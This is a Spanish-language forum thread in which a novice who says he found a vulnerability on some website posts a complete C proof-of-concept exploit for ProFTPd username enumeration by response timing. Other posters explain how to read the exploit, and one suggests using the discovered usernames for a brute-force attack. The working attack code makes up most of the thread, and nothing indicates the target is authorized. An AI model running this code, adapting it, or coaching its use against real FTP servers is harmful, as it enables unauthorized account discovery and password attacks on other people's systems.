exploit en c

[invisible_soul]

miren encontre una vulne en una pagina, busque el exploit ( en c ) y ise todo el atado despues lo ejecute todo bien y me sale esto, se supone que me tienen que decir lo que haga pero no caxo como pode aprovechar la vulneravilidad

[Microchip]

Lo hiciste con el SSS entonces los dos primeros vinculos de abajo hacia arriva te mandan a una descripción de lo que hace el exploit y te manda tb a la pagina sea de php, o el servicio creador del programa que tiene la vulnerabilidad, tendrias que leer esos vinculos para ubicarte como trabaja el xploit y por ultimo en el codigo fuente tb tiene un poco de información acerca de lo que hace y como se ejecuta :S

[invisible_soul]

ok.. microchip voy a  volver a escanearlo , porque ya lo habia cerrado.... pero desde hay ( de la foto cmd) no se puede sacar ni una informacion sobre como puedo aprovechar este exploit ?

[Microchip]

Nop, tienes que fijarte en el codigo fuente, cuando le haces click a xploit de la pagina de vulnerabilidad es te da un codigo fuente que llevas al blog de notas para pasarlo a *.c y recien lo compilas, en ese codigo fuente fijate primero lo que este /*   */ (comentario del xploit que bajaste, por lo general esta al comienzo).
Y guarda tu sesion en el SSS para que si necesitas algo no tengas que volver a scanear desde "0"

[invisible_soul]

no encontre lo que me dijiste..
aca va el exploit

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic //
Para ver este enlace Registrate o Inicia Sesion

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
  int sock,n,y;
  long dist,stat=0;
  struct sockaddr_in sin;
  char buf[1024], buf2[1024];
  struct timeval tv, tv2;
  struct timezone tz, tz2;

  printf ("Proftpd remote users discovery exploit\n"
          " Coded by Leon / LSS Security\n"
          ">-------------------------------------<\n");

  if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }
 
  sock = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (PORT);
  sin.sin_addr.s _addr = inet_addr (argv[1]);
  bzero (sin.sin_zero,8);

  connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

  printf ("Login time: ");
  n = read (sock,buf2, sizeof(buf2));
  for (y=0;y<PROBE;y++) {
     gettimeofday (&tv,&tz);
     snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
     write (sock, buf, strlen(buf));
     n = read (sock,buf2, sizeof(buf2));
     gettimeofday (&tv2,&tz2);
     dist =tv2.tv_usec - tv.tv_usec;
     stat += dist;
     printf (" %d |",dist);
  }
  printf ("\nAvrg: %d\n",(stat/PROBE));
  close (sock);
}

[OzX]

// ProFTPd remote users discovery based on code execution time - POC exploit

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

es posible determinar que usario es valido , y cual era especial y cual existe y cual no.. en sistema. 

aqui mas informacion en su paginas oficial :
Para ver este enlace Registrate o Inicia Sesion

AQUI

mas alla de saber que usario existe y cual no.. y cual es especial no sirve de nada , talves se podria hacer un ataque de fuerza bruta porque ya se sabria el nombre de usuario..